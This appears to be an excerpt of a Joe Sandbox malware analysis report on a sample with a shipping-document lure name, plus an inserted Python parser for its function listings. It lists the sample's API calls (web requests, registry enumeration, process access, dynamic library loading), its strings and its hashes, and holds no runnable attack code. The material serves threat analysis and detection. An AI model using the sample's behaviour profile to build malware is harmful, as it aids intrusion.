                                                                • Instruction ID: 65e883c53e0f85e5f746526e0c2e1f8c4ee2ccd7ff7a958b3a18076e7cca5b7a
                                                                • Opcode Fuzzy Hash: df93748df28026e120bd50aa8452f589aae65c302aa32c187c5f8769bf2b3d95
                                                                • Instruction Fuzzy Hash: F751BD71608301AADB24DF2CD845A6FB7E8EF99360F140A6DF8D5D6190EB70CD44DBA2
                                                                APIs
                                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0098D5D4
                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0098D60A
                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0098D61B
                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0098D69D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                                • String ID: DllGetClassObject
                                                                • API String ID: 753597075-1075368562
                                                                • Opcode ID: ddbddead77e1fabf8c6e3a6fda65d2715dba3d624816ecea9c42b8aa2a55cbc8
                                                                • Instruction ID: 2091bfb128868e3cb6455f8977bfcc31cbca27d83576c4ec15c53c281bef8256
                                                                • Opcode Fuzzy Hash: ddbddead77e1fabf8c6e3a6fda65d2715dba3d624816ecea9c42b8aa2a55cbc8
                                                                • Instruction Fuzzy Hash: BC418FB1601208EFDB15EF54C884B9ABBA9EF44314F1585ADEC099F385E7B1DE40CBA0
                                                                APIs
                                                                • _memset.LIBCMT ref: 009927C0
                                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 009927DC
                                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 00992822
                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,009F5890,00000000), ref: 0099286B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Menu$Delete$InfoItem_memset
                                                                • String ID: 0
                                                                • API String ID: 1173514356-4108050209
                                                                • Opcode ID: a4fb88bb800251fcc139feb16355e23ac3dfa3d848cc8a0d5da0fb2f0f56812a
                                                                • Instruction ID: 4b5410d6cf9ebb9911c56b7aaab8dc065eee8a38499c6f3f1a601efb4e1e7ee1
                                                                • Opcode Fuzzy Hash: a4fb88bb800251fcc139feb16355e23ac3dfa3d848cc8a0d5da0fb2f0f56812a
                                                                • Instruction Fuzzy Hash: D841AE74208301AFDB20DF29CC44F2ABBE8EF85324F044A2DF9A5972D1D770A805CB62
                                                                APIs
                                                                • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 009AD7C5
                                                                  • Part of subcall function 0093784B: _memmove.LIBCMT ref: 00937899
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: BuffCharLower_memmove
                                                                • String ID: cdecl$none$stdcall$winapi
                                                                • API String ID: 3425801089-567219261
                                                                • Opcode ID: 5caba85504c564f24c7cc3e9685820910db625b86bac9084f66bd9762bf1582d
                                                                • Instruction ID: 50d2e6699941921d541644778aaa96eb21c6068d34a5293af9cf5ca7a10f97f1
                                                                • Opcode Fuzzy Hash: 5caba85504c564f24c7cc3e9685820910db625b86bac9084f66bd9762bf1582d
                                                                • Instruction Fuzzy Hash: 7E31A171904619AFCF10EF99CC55AEEB7B5FF85320F108A29E826976D1DB31AD05CB80
                                                                APIs
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                  • Part of subcall function 0098AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0098AABC
                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00988F14
                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00988F27
                                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 00988F57
                                                                  • Part of subcall function 00937BCC: _memmove.LIBCMT ref: 00937C06
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$_memmove$ClassName
                                                                • String ID: ComboBox$ListBox
                                                                • API String ID: 365058703-1403004172
                                                                • Opcode ID: 032e6c7e5fbcd970c76fc5c8a1d12661717c683a4985e99c2ff4a9df678c83f2
                                                                • Instruction ID: 302e224a8694f2fc1fdf5513491885833317d5ed36fdfaff36ef35800f92b603
                                                                • Opcode Fuzzy Hash: 032e6c7e5fbcd970c76fc5c8a1d12661717c683a4985e99c2ff4a9df678c83f2
                                                                • Instruction Fuzzy Hash: 5321F571904108BADB14BBA0CC85EFFB779DF85320F544519F921A72E1DB39080A9B60
                                                                APIs
                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009A184C
                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009A1872
                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009A18A2
                                                                • InternetCloseHandle.WININET(00000000), ref: 009A18E9
                                                                  • Part of subcall function 009A2483: GetLastError.KERNEL32(?,?,009A1817,00000000,00000000,00000001), ref: 009A2498
                                                                  • Part of subcall function 009A2483: SetEvent.KERNEL32(?,?,009A1817,00000000,00000000,00000001), ref: 009A24AD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                • String ID:
                                                                • API String ID: 3113390036-3916222277
                                                                • Opcode ID: 7f7912e56687e7a7956a464ebed116086127f79e5289bf1ea2db5ad51b3bf8d1
                                                                • Instruction ID: a18e3377d081eb813f61c784cd75f874b0e42dea0ce2ed53112277a90655c275
                                                                • Opcode Fuzzy Hash: 7f7912e56687e7a7956a464ebed116086127f79e5289bf1ea2db5ad51b3bf8d1
                                                                • Instruction Fuzzy Hash: 4E21C2B1504308BFEB119F69DC85FBF77EDEB8A754F10412AF80596140EB288D05A7E0
                                                                APIs
                                                                  • Part of subcall function 00931D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00931D73
                                                                  • Part of subcall function 00931D35: GetStockObject.GDI32(00000011), ref: 00931D87
                                                                  • Part of subcall function 00931D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00931D91
                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 009B6461
                                                                • LoadLibraryW.KERNEL32(?), ref: 009B6468
                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 009B647D
                                                                • DestroyWindow.USER32(?), ref: 009B6485
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                • String ID: SysAnimate32
                                                                • API String ID: 4146253029-1011021900
                                                                • Opcode ID: b7c98f3cb3982839ba4f3efe4db27ea8852502237ab9ce1a682d9e975213364d
                                                                • Instruction ID: dab57d8e8b8986d9b4e7f2c87f89927269209716595c5742ce80d77c4b723afb
                                                                • Opcode Fuzzy Hash: b7c98f3cb3982839ba4f3efe4db27ea8852502237ab9ce1a682d9e975213364d
                                                                • Instruction Fuzzy Hash: 86219F71110605BFEF104FA4DD94EFB77AEEB59378F104A29FA10920A0D779EC41A760
                                                                APIs
                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00996DBC
                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00996DEF
                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00996E01
                                                                • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00996E3B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CreateHandle$FilePipe
                                                                • String ID: nul
                                                                • API String ID: 4209266947-2873401336
                                                                • Opcode ID: 99ece5da84df7a2221eaf28397a078b107d0d93c35af2c073182c409c6bdaaa8
                                                                • Instruction ID: ac15fe8e5d33d68e65c85b736495ef9a3c76a34cfd5970a94db817604b3becee
                                                                • Opcode Fuzzy Hash: 99ece5da84df7a2221eaf28397a078b107d0d93c35af2c073182c409c6bdaaa8
                                                                • Instruction Fuzzy Hash: 24218E7560020AABDF209F6DDD05B9A7BB8EF84720F204A29FDB0D72D0DB71A950DB50
                                                                APIs
                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00996E89
                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00996EBB
                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00996ECC
                                                                • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00996F06
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CreateHandle$FilePipe
                                                                • String ID: nul
                                                                • API String ID: 4209266947-2873401336
                                                                • Opcode ID: 8e90e94855269b238fa6b14415f0db5668e8d2a597d579a955db68a6cfae9902
                                                                • Instruction ID: 0bbec6d3388f4c9e0b72aa6a288fcc367210910da3df8543b98bb3d85aca0b69
                                                                • Opcode Fuzzy Hash: 8e90e94855269b238fa6b14415f0db5668e8d2a597d579a955db68a6cfae9902
                                                                • Instruction Fuzzy Hash: 10216079500305ABDF209FADDD04AAA77A8AF55731F200B19F9A1D72D0D770A8618B50
                                                                APIs
                                                                • SetErrorMode.KERNEL32(00000001), ref: 0099AC54
                                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0099ACA8
                                                                • __swprintf.LIBCMT ref: 0099ACC1
                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,009BF910), ref: 0099ACFF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                                • String ID: %lu
                                                                • API String ID: 3164766367-685833217
                                                                • Opcode ID: e2582d92a61befa32ab2ac2eed786789219001bbb668ba597ed8eb1419bb187f
                                                                • Instruction ID: 30b902ee459333343b46522711c955f2da3b45026941bea01678479fe3e6953e
                                                                • Opcode Fuzzy Hash: e2582d92a61befa32ab2ac2eed786789219001bbb668ba597ed8eb1419bb187f
                                                                • Instruction Fuzzy Hash: 62214F35A00109AFCB10EF69CD85EAE7BB8EF89714B004469F909EB251DB71EA41DB61
                                                                APIs
                                                                • CharUpperBuffW.USER32(?,?), ref: 00991B19
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: BuffCharUpper
                                                                • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                • API String ID: 3964851224-769500911
                                                                • Opcode ID: 25db002a1a062d54088095b0e2c009a28346ef5735d1e8320da9f4a7e42c1709
                                                                • Instruction ID: ed8f91fecad0e7562193e0a297a1c23f29ff83e1a6f17c53e29ae5809e386b9e
                                                                • Opcode Fuzzy Hash: 25db002a1a062d54088095b0e2c009a28346ef5735d1e8320da9f4a7e42c1709
                                                                • Instruction Fuzzy Hash: 63118E319002498FCF10EF99D8519FEB7B5FFA5304B1044A4E81967296EF329D0ACF40
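The function entries in this listing all follow one layout: a bulleted API call list (direct calls plus "Part of subcall function" lines for calls made inside callees), the memory dump source, and the Similarity fields (API ID, String ID, API String ID, Opcode ID, Instruction ID and the two fuzzy hashes). The Python below is added here as an example and is not part of the Joe Sandbox report; it parses that layout into one record per function so the hashes and API/string signatures can be compared across functions or across reports. SAMPLE is a constructed excerpt copied from three entries on this page (the two CreatePipe/CreateFileW "nul" stubs and the WinINet function) with their repeated metadata lines cut. The call-line grammar and the handling of the "Download File" link text that the page extraction glued onto the Associated filenames are inferred from the visible text and are assumptions.

```python
"""Parse Joe Sandbox per-function API listings (the layout above) into records
that can be pivoted on. Added example, not part of the report; SAMPLE is a
constructed excerpt of three entries from this page with repeated lines cut."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

SAMPLE = """\
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00996DBC
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00996DEF
• GetStdHandle.KERNEL32(0000000C), ref: 00996E01
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00996E3B
Memory Dump Source
• Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
• Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: 99ece5da84df7a2221eaf28397a078b107d0d93c35af2c073182c409c6bdaaa8
• Instruction Fuzzy Hash: 24218E7560020AABDF209F6DDD05B9A7BB8EF84720F204A29FDB0D72D0DB71A950DB50
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00996E89
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00996EBB
• GetStdHandle.KERNEL32(000000F6), ref: 00996ECC
• CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00996F06
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: 8e90e94855269b238fa6b14415f0db5668e8d2a597d579a955db68a6cfae9902
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009A184C
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009A1872
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009A18A2
• InternetCloseHandle.WININET(00000000), ref: 009A18E9
  • Part of subcall function 009A2483: GetLastError.KERNEL32(?,?,009A1817,00000000,00000000,00000001), ref: 009A2498
  • Part of subcall function 009A2483: SetEvent.KERNEL32(?,?,009A1817,00000000,00000000,00000001), ref: 009A24AD
• API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
• String ID:
• API String ID: 3113390036-3916222277
"""

SUFFIX = "Download File"   # link text the page extraction glued onto filenames
CALL_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>[A-Za-z_][\w@]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref: (?P<ref>[0-9A-Fa-f]+)$")
FIELD_RE = re.compile(r"^(?P<key>[A-Za-z ]+): ?(?P<val>.*)$")


@dataclass
class Call:
    api: str
    module: str
    args: str                       # as printed; '?' marks an unresolved value
    ref: int                        # call-site address
    subcall_of: str | None = None   # callee address when reported via a subcall


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)   # Similarity and dump fields


def parse_report(text):
    """One FunctionRecord per 'APIs' heading; bullets are calls or fields."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs" or (cur is None and line.startswith("•")):
            cur = FunctionRecord()           # excerpts may start mid-record
            records.append(cur)
        if not line.startswith("•"):         # section headings carry no data
            continue
        body = line[1:].strip()
        if m := CALL_RE.match(body):
            cur.calls.append(Call(m["api"], m["module"], m["args"] or "",
                                  int(m["ref"], 16), m["sub"]))
        elif m := FIELD_RE.match(body):
            key, val = m["key"].strip(), m["val"].strip()
            if key == "Associated":          # strip the download-link residue
                if val.endswith(SUFFIX):
                    val = val[: -len(SUFFIX)]
                cur.meta.setdefault(key, []).append(val)
            else:
                cur.meta[key] = val
    return records


def direct_api_names(rec):
    """APIs called from the function body itself, in first-occurrence order."""
    names = []
    for c in rec.calls:
        if c.subcall_of is None and c.api not in names:
            names.append(c.api)
    return names


def shared_api_string_ids(records):
    """API String ID -> Opcode IDs of every function carrying it, kept only when
    more than one function shares the same API-set/string signature."""
    groups = {}
    for rec in records:
        key = rec.meta.get("API String ID")
        if key:
            groups.setdefault(key, []).append(rec.meta.get("Opcode ID", ""))
    return {k: v for k, v in groups.items() if len(v) > 1}
```

On the sample, shared_api_string_ids() returns the two CreatePipe/CreateFileW "nul" functions at 00996DBC and 00996E89 under API String ID 4209266947-2873401336 with different Opcode IDs: the same import set and string compiled into two distinct bodies. Every Similarity field survives in the record's meta dict, so the Instruction Fuzzy Hash values can be pulled from the same records for similarity pivots across other reports.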
                                                                APIs
                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 009AEC07
                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 009AEC37
                                                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 009AED6A
                                                                • CloseHandle.KERNEL32(?), ref: 009AEDEB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                • String ID:
                                                                • API String ID: 2364364464-0
                                                                • Opcode ID: d68c2c4acf12144fbc53a3ba5474209b0a5eb79c0fef14104a18eb809f8e3693
                                                                • Instruction ID: 1f6f3381b93f94d4c57b5069ca476f8f98f27636e2d38339b9bbcae5288ce96b
                                                                • Opcode Fuzzy Hash: d68c2c4acf12144fbc53a3ba5474209b0a5eb79c0fef14104a18eb809f8e3693
                                                                • Instruction Fuzzy Hash: F0815F716047009FD760EF28D886F2AB7E5AF85720F14891DF9999B2D2DBB0AD40CF91
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                • String ID:
                                                                • API String ID: 1559183368-0
                                                                • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                • Instruction ID: 82c0aafb35718242cae8fabbd4af23d7d02091678ce9ce59ec9c9c20032f34dc
                                                                • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                • Instruction Fuzzy Hash: BD51E870A00B05DBCB24DF6BD89066E77BAAF40333F258729FC25962D2E7749D598B40
                                                                APIs
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                  • Part of subcall function 009B0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009AFDAD,?,?), ref: 009B0E31
                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009B00FD
                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009B013C
                                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 009B0183
                                                                • RegCloseKey.ADVAPI32(?,?), ref: 009B01AF
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 009B01BC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                • String ID:
                                                                • API String ID: 3440857362-0
                                                                • Opcode ID: 2ead612b64812970be4a5943f201da9df6b9f81bf036782540c869f1819b0019
                                                                • Instruction ID: e3d4a3d13f30a0cc2e5c414a958868551f9c92d53a4ddf5f4d190dc7b338aff9
                                                                • Opcode Fuzzy Hash: 2ead612b64812970be4a5943f201da9df6b9f81bf036782540c869f1819b0019
                                                                • Instruction Fuzzy Hash: 12512871208204AFD714EF58C991FABB7E9FF84324F40492DF596872A2DB71E905CB52
                                                                APIs
                                                                  • Part of subcall function 00939837: __itow.LIBCMT ref: 00939862
                                                                  • Part of subcall function 00939837: __swprintf.LIBCMT ref: 009398AC
                                                                • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 009AD927
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 009AD9AA
                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 009AD9C6
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 009ADA07
                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 009ADA21
